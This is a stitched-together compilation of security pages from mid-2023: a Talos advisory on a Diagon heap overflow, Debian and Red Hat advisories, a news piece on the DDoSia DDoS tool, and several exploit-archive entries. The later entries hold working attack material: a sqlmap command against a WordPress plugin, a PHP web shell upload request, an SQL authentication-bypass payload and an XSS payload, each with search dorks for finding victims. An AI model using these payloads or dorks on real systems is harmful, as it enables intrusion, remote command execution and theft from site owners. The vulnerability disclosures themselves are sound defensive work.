A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Diagon v1.0.139

**PRODUCT URLS**

Diagon - https://github.com/ArthurSonzogni/Diagon

**CVSSv3 SCORE**

8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Diagon is an interpreter that translates markdown in several formats: latex, planar graph, table, tree and many others.

The Diagon interpreter translates a markdown text sequence diagram to a graphical sequence diagram. For instance, the input could look like this:

    Left -> Right: Message1
    Left <- Right: Message2
    

and the sequence diagram would result in:

     ┌────┐  ┌─────┐
     │Left│  │Right│
     └─┬──┘  └──┬──┘
       │        │
       │Message1│
       │───────>│
       │        │
       │Message2│
       │<───────│
     ┌─┴──┐  ┌──┴──┐
     │Left│  │Right│
     └────┘  └─────┘
    

The input will be parsed and will eventually reach the Sequence::UniformizeActors function:

    void Sequence::UniformizeActors() {
      [...]
    
      for (auto& message : messages) {
        for (auto& actor : {message.from, message.to}) {
          if (!actor_index.count(actor)) {
            actor_index[actor] = actors.size();
            Actor a;
            a.name = actor;
            actors.push_back(a);
          }
        }
      }
    }
    

This function will parse the actors in each message in messages, which consist of each row of the sequence diagram text. The actors are the sender and the receiver. In the example above, the actors are “Left” and “Right.” The function populates the actors vector and associates, in the actor_index map, the name of the actor with the number of elements in the actors vector at the creation time of the entry. This essentially can be considered an index starting from 0 and increasing with each new actor.

Eventually the Sequence::LayoutComputeActorsPositions function will be called to calculate the position of the various actors in the sequence diagram:

    void Sequence::LayoutComputeActorsPositions() {
      [...]
      
      for (auto& message : messages) {
        ActorSpace space{actor_index[message.from],  //
                         actor_index[message.to],    //
                         message.width + 1};         //
        if (space.a > space.b)
          std::swap(space.a, space.b);
        spaces.push_back(space);
      }
    
      if (actors.size() != 0)
        actors[0].center = actors[0].name.size() / 2 + 1;
    
      bool modified = true;
      int i = 0;
      while (modified) {
        modified = false;
        for (const ActorSpace& s : spaces) {
          if (actors[s.b].center - actors[s.a].center < s.space) {                                                  [1]
            actors[s.b].center = actors[s.a].center + s.space;
            modified = true;
          }
        }
        if (i++ > 500) {                                                                                            [2]
          std::cout << "Something went wrong!" << std::endl;
          break;
        }
      }
    
      for (auto& actor : actors) {                                                                                  [3]
        actor.left = actor.center - actor.name.size() / 2 - actor.name.size() % 2;
        actor.right = actor.left + actor.name.size() + 2;
      }
    }
    

Then, using the calculated positions, a Screen class is instantiated:

    std::string Sequence::Draw() {
        // Estimate output dimension.
        int width = actors.back().right;
        int height = 0;
        for (const Message& message : messages) {
          height = std::max(height, message.bottom);
        }
        height += 4;
    
        Screen screen(width, height);
    
        for (auto& actor : actors)
          actor.Draw(screen, height);
    
        for (auto message : messages)
          message.Draw(screen);
    
        if (ascii_only_)
          screen.ASCIIfy(0);
        return screen.ToString();
    }
    

The Screen class contains the lines_ matrix where the graphical sequence diagram is going to be written. This matrix takes into consideration the various sizes involved: the actors, the arrows, the messages, etc. Eventually the names of the actors and the messages between the them will be “drawn.” For each of these texts the Screen::DrawText function will be called:

    void Screen::DrawText(int x, int y, std::wstring_view text) {
        for (auto& c : text)
            lines_[y][x++] = c;                                                                                     [4]
    } Here `lines_` is the member of the `Screen` class instantiated in `Sequence::Draw`.
    

Sequence::LayoutComputeActorsPositions uses a variable called spaces. This is a vector dictating the minimum spaces between two actors. The spaces vector contains various instances of the ActorSpace struct. This struct contains two indexes for specifying which actors are involved: the ones stored in the actor_index map, and an integer value that represents the minimum spaces required between the two actors. For each message, one struct is created, using the minimum space required to write the message between the two actors. The spaces vector also contains the spaces required for each pair of adjacent actors. Each actor has three parameters to satisfy this space requirements: left, center and right. These dictate the position of each actor in the diagram.

To simplify the code explanation following, we are going to omit that the spaces array has the distances also for the adjacent actors and consider only the spaces in relationship to the messages and their sender and receiver actors. The Sequence::LayoutComputeActorsPositions function executes a while loop to modifying the actors positions based on the content of spaces. The while is executed until either the condition actors[s.b].center - actors[s.a].center < s.space, at [1], is false, meaning that the space between the two actors is enough for the message to be drawn with no modification of the actors positions, or the while has been executed 500 times, a check is executed at [2], and something was wrong, as suggested by the print.

This function has a bug, which can lead to a heap buffer overflow. Let’s take for example the following representation of a sequence diagram:

      A -> A:Message
    

In this example the sender and the receiver are the same actor, meaning that the index of the two will be equal; in this example, 0. The condition at [1], actors[s.b].center - actors[s.a].center < s.space for this example, can be simplified as actors[0].center - actors[0].center < s.space. Because the portion on the left is always equal to 0, this condition is always true. This means that the actors[s.b].center value is always updated without progress for making the condition at [1] false. Furthermore, also at [3], the actor’s left and right positions are updated, increasing their value.

Eventually the code at [4] is reached. The variable lines_ has a width and a height that are based on the positions calculated for the actors and the messages. The problem is that, even if the while in Sequence::LayoutComputeActorsPositions has been executed 500 times, no progress on changing the position of the actor to accommodate the message has been made. Indeed, the actor’s center, left and right values increased substantially, but the distance between the values did not. In this example the only actor present has the following position values:

      (gdb) p actors
      $19 = std::vector of length 1, capacity 1 = {{
          [...]
          left = 0xfb0,
          center = 0xfb1,
          right = 0xfb3
        }}
    

The left is 1 value from center, which is 2 value away from right. This is due to the calculation made at [3]. The space between left and right should take into consideration the length of the message, but because of the bug just explained it was not possible to account for that. This can lead to a heap buffer overflow vulnerability at [4] writing the message out-of-bounds.

**Exploit Proof of Concept**

Following the content of the POC used:

    $ cat POC.md
    A->A:POC_BOF
    

If we run Diagon compilation with ASAN with the POC:

    $ diagon Sequence < POC.md
    
    Something went wrong!
    =================================================================
    ==256826==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x628000017fd0 at pc 0x000000c77eab bp 0x7fff5f481050 sp 0x7fff5f481048
    WRITE of size 4 at 0x628000017fd0 thread T0
        #0 0xc77eaa in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >) /home/vagrant/Diagon/src/screen/Screen.cpp:32:20
        #1 0x8a1515 in Message::Draw(Screen&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:71:12
        #2 0x8aefb0 in Sequence::Draw[abi:cxx11]() /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:692:13
        #3 0x8acc37 in Sequence::Translate(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:293:10
        #4 0x4fbd0e in (anonymous namespace)::Translate(Translator*, int, char const**) /home/vagrant/Diagon/src/main.cpp:277:36
        #5 0x4f97e7 in main /home/vagrant/Diagon/src/main.cpp:326:12
        #6 0x7f1a7e31ad09 in __libc_start_main csu/../csu/libc-start.c:308:16
        #7 0x44ca69 in _start (/home/vagrant/Diagon/build/diagon-1.0.139+0x44ca69)
    
    0x628000017fd0 is located 0 bytes to the right of 16080-byte region [0x628000014100,0x628000017fd0)
    allocated by thread T0 here:
        #0 0x4f677d in operator new(unsigned long) (/home/vagrant/Diagon/build/diagon-1.0.139+0x4f677d)
        #1 0x7f1a7e655a0e in void std::__cxx11::basic_string<wchar_t, std::char_traits<wchar_t>, std::allocator<wchar_t> >::_M_construct<wchar_t*>(wchar_t*, wchar_t*, std::forward_iterator_tag) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14ba0e)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/Diagon/src/screen/Screen.cpp:32:20 in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >)
    Shadow bytes around the buggy address:
      0x0c507fffafa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c507fffaff0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
      0x0c507fffb000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==256826==ABORTING
    

We can see that a heap buffer overflow occured at Sequence.cpp:71 that corresponds to the code at [4].

**VENDOR RESPONSE**

The maintainer has provided a patch at: https://github.com/ArthurSonzogni/Diagon/releases/tag/v1.1.158

**TIMELINE**

2023-05-03 - Vendor Disclosure  
2023-05-08 - Vendor Patch Release  
2023-07-05 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-27390: TALOS-2023-1744 || Cisco Talos Intelligence Group

Debian Linux Security Advisory 5446-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5446-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-36664It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle permission validation for pipe devices, whichcould result in the execution of arbitrary commands if malformeddocument files are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 9.53.3~dfsg-7+deb11u5.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u1.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSjKvpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5lBAAivkfCmcEfUUjFaT3xhCMNFX5bCHJalKiZ0YpLfLOq6zhveOUoemlI6ValXRmV3kOz7ZdgghXkQ+TxrdcK0GmKy/Mb5Osi4oWU9KcID8Qa/Gu0aEGuz0YCCikyGcaUMlkaZZRtnse5lPOf27avgBDZEkw5vwSXlCEdgleOY/fpX13sKdOrUB5H4Ma79T5RqcLIxMQn/L2YChfjz+3iuY5rfgY50d00g+1r+xomALzQBqYpMFB2iM52gwoBTOQ9nVr2+fuQdfE71ZVHjqOn+xVhJhhKp7fG/uzPz021L1Jec0xvjxh3WGEPfc8kF6sShnoze06l9LfyyVsH629+G0zxcvaK2chku5iJU1zzUh5NQiCMbo6Tdp1c8OxIuuPwdVIRJbMqCDPvz+UJ/KxbnAhN77f/3eb98wTdPWHdW6t5LPdngDxXimHg6RXi2eANVjFOp6XZZ6iju9TvsxPq/MMiBlbD5KPnUK8n6sl8O1b7lHZgy7KU2qFIqWcs482gsrf9ZIMMR4PgNJjp3YQDXjkME/AgUwWKpEx91MKSyc1ygfZYJr7WRnwg81dgTX7hx/GW9fcwprTcGn2H3FmJsnuIYz9wsgLp5x6/WWB1tF7ZGzhYHNgK0QphejDDGTDUTqRcYsiVTkfutBJw2OzDVoIQyrUn78y9Ux1aueF1NM1fMQ==bsYs-----END PGP SIGNATURE-----

Debian Security Advisory 5446-1

A vulnerability was found in quarkus-core. This vulnerability occurs because the TLS protocol configured with quarkus.http.ssl.protocols is not enforced, and the client can force the selection of the weaker supported TLS protocol.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-29

Updated:

2023-06-29

**RHSA-2023:3809 - Security Advisory**

*   Overview

**Synopsis**

Moderate: Red Hat build of Quarkus 2.13.8 release and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update is now available for Red Hat build of Quarkus. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.

**Description**

This release of Red Hat build of Quarkus 2.13.8 includes security updates, bug  
fixes, and enhancements. For more information, see the release notes page listed in the References section.  

Security Fixes:  

*   CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray \[quarkus-2\]
*   CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks \[quarkus-2\]
*   CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption \[quarkus-2\]
*   CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow \[quarkus-2\]
*   CVE-2023-0482 RESTEasy: creation of insecure temp files \[quarkus-2\]
*   CVE-2022-3782 keycloak: path traversal via double URL encoding \[quarkus-2\]
*   CVE-2023-0481 io.quarkus-quarkus-parent: quarkus: insecure permissions on temp files \[quarkus-2\]
*   CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider \[quarkus-2\]

For more information about the security issues, including the impact, a CVSS  
score, acknowledgments, and other related information, see the CVE links listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Build of Quarkus Text-Only Advisories x86\_64

**Fixes**

*   BZ - 2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider
*   BZ - 2163533 - CVE-2023-0481 quarkus: insecure permissions on temp files
*   BZ - 2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files
*   BZ - 2174854 - CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks
*   BZ - 2180886 - CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow
*   BZ - 2181977 - CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption
*   BZ - 2182788 - CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray
*   BZ - 2211026 - CVE-2023-2974 quarkus-core: TLS protocol configured with quarkus.http.ssl.protocols is not enforced, client can enforce weaker supported TLS protocol
*   QUARKUS-2672 - Infinispan client is not aligned with newly released Red Hat Data Grid 8.4
*   QUARKUS-2787 - Rest Data Panache: Correct Open API integration
*   QUARKUS-2846 - Ensure that new line chars don't break Panache projection
*   QUARKUS-2978 - ExceptionMapper<WebApplicationException> is not working in DEV mode
*   QUARKUS-3158 - Do not create session and PKCE encryption keys if only bearer tokens are expected
*   QUARKUS-3159 - 2.13: Do not support any Origin by default if CORS is enabled
*   QUARKUS-3161 - Fix security-csrf-prevention.adoc
*   QUARKUS-3164 - Logging with Panache: fix LocalVariablesSorter usage
*   QUARKUS-3167 - Make SDKMAN releases minor for maintenance and preview releases
*   QUARKUS-3168 - Backport Ensure that ConfigBuilder classes work in native mode to 2.13
*   QUARKUS-3169 - New home for Narayana LRA coordinator Docker images
*   QUARKUS-3170 - Fix truststore REST Client config when password is not set
*   QUARKUS-3173 - Reinitialize sun.security.pkcs11.P11Util at runtime
*   QUARKUS-3174 - Prevent SSE writing from potentially causing accumulation of headers
*   QUARKUS-3175 - Filter out RESTEasy related warning in ProviderConfigInjectionWarningsTest
*   QUARKUS-3176 - Make sure parent modules are loaded into workspace before those that depend on them
*   QUARKUS-3177 - Fix copy paste error in qute docs
*   QUARKUS-3178 - Pass \`--userns=keep-id\` to podman only when in rootless mode
*   QUARKUS-3179 - Fix stuck HTTP2 request when sent challenge has resumed request
*   QUARKUS-3181 - Make sure quarkus:go-offline properly supports test scoped dependencies
*   QUARKUS-3184 - Use SchemaType.ARRAY instead of "ARRAY" for native support
*   QUARKUS-3185 - Simplify logic in create-app.adoc and allow to define stream
*   QUARKUS-3187 - Allow context propagation for OpenTelemetry
*   QUARKUS-3188 - Fix RestAssured URL handling and unexpected restarts in QuarkusProdModeTest
*   QUARKUS-3191 - Drop ':z' bind option when using MacOS and Podman
*   QUARKUS-3194 - Exclude Netty's reflection configuration files
*   QUARKUS-3195 - Integrate the api dependency from Infinispan 14 (#ISPN-14268)
*   QUARKUS-3205 - Missing JARs and other discrepancies related to xpp3 dependency in 2.13.8.

**CVEs**

*   CVE-2022-45787
*   CVE-2023-0481
*   CVE-2023-0482
*   CVE-2023-1436
*   CVE-2023-1584
*   CVE-2023-2974
*   CVE-2023-26053
*   CVE-2023-28867

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_build\_of\_quarkus/2.13/
*   https://access.redhat.com/articles/4966181

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-2974

WordPress WP AutoComplete Search plugin versions 1.0.4 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi# Date: 30/06/2023# Exploit Author: Matin nouriyan (matitanium)# Version: <= 1.0.4# CVE: CVE-2022-4297Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/# Tested on: Kali linux---------------------------------------The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,leading to an unauthenticated SQL injection--------------------------------------How to Reproduce this Vulnerability:1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests3. Find requests belong to WP AutoComplete like step 54. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

WordPress WP AutoComplete Search 1.0.4 SQL Injection

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.
The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the

The threat actors behind the **DDoSia** attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.

The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the \[command-and-control\] to the users," cybersecurity company Sekoia said in a technical write-up.

DDoSia is attributed to a pro-Russian hacker group called NoName(057)16. Launched in 2022 and a successor of the Bobik botnet, the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan.

Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different websites were impacted.

Python and Go-based implementations of DDoSia have been unearthed to date, making it a cross-platform program capable of being used across Windows, Linux, and macOS systems.

"DDoSia is a multi-threaded application that conducts denial-of-service attacks against target sites by repeatedly issuing network requests," SentinelOne explained in an analysis published in January 2023. "DDoSia issues requests as instructed by a configuration file that the malware receives from a C2 server when started."

DDoSia is distributed through a fully-automated process on Telegram that allows individuals to register for the crowdsourced initiative in exchange for a cryptocurrency payment and a ZIP archive containing the attack toolkit.

What's noteworthy about the new version is the use of encryption to mask the list of targets to be attacked, indicating that the tool is being actively maintained by the operators.

"NoName057(16) is making efforts to make their malware compatible with multiple operating systems, almost certainly reflecting their intent to make their malware available to a large number of users, resulting in the targeting of a broader set of victims," Sekoia said.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of targeted denial-of-service (DoS) and DDoS attacks against multiple organizations in multiple sectors.

"These attacks can cost an organization time and money and may impose reputational costs while resources and services are inaccessible," the agency said in a bulletin.

Although CISA did not provide any additional specifics, the warning overlaps with claims by Anonymous Sudan on its Telegram channel that it had taken down the websites of the Department of Commerce, Social Security Administration (SSA), and the Treasury Department's Electronic Federal Tax Payment System (EFTPS).

Anonymous Sudan attracted attention last month for carrying Layer 7 DDoS attacks against various Microsoft services, including OneDrive, Outlook, and Azure web portals. The tech giant is tracking the cluster under the name Storm-1359.

The hacking crew has asserted it's conducting cyber strikes out of Africa on behalf of oppressed Muslims across the world. But cybersecurity researchers believe it to be a pro-Kremlin operation with no ties to Sudan and a member of the KillNet hacktivist collective.

In an analysis released on June 19, 2023, Australian cybersecurity vendor CyberCX characterized the entity as a "smokescreen for Russian interests." The company's website has since become inaccessible, greeting visitors with a "403 Forbidden" message. The threat actor claimed responsibility for the cyber attack.

"The reason for the attack: stop spreading rumors about us, and you must tell the truth and stop the investigations that we call the investigations of a dog," Anonymous Sudan said in a message posted on June 22, 2023.

Anonymous Sudan, in a Bloomberg report last week, further denied it was connected to Russia but acknowledged they share similar interests, and that it goes after "everything that is hostile to Islam."

CISA's latest advisory has also not gone unnoticed, for the group posted a response on June 30, 2023, stating: "A small Sudanese group with limited capabilities forced 'the most powerful government' in the world to publish articles and tweets about our attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

**Adveris CMS 3.0 Cross Site Scripting**

Posted Jul 4, 2023

Authored by indoushka

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f4e69d15add89915deaf239446b331cc9106cc57ee69bf29f992d6be03d4d471

Download | Favorite | View

**Adveris CMS 3.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Adveris CMS v3.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://adveris.fr                                                                                                  |  | # Dork      : "Création site internet : Adveris" inurl:.php?id=                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!>[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,556)
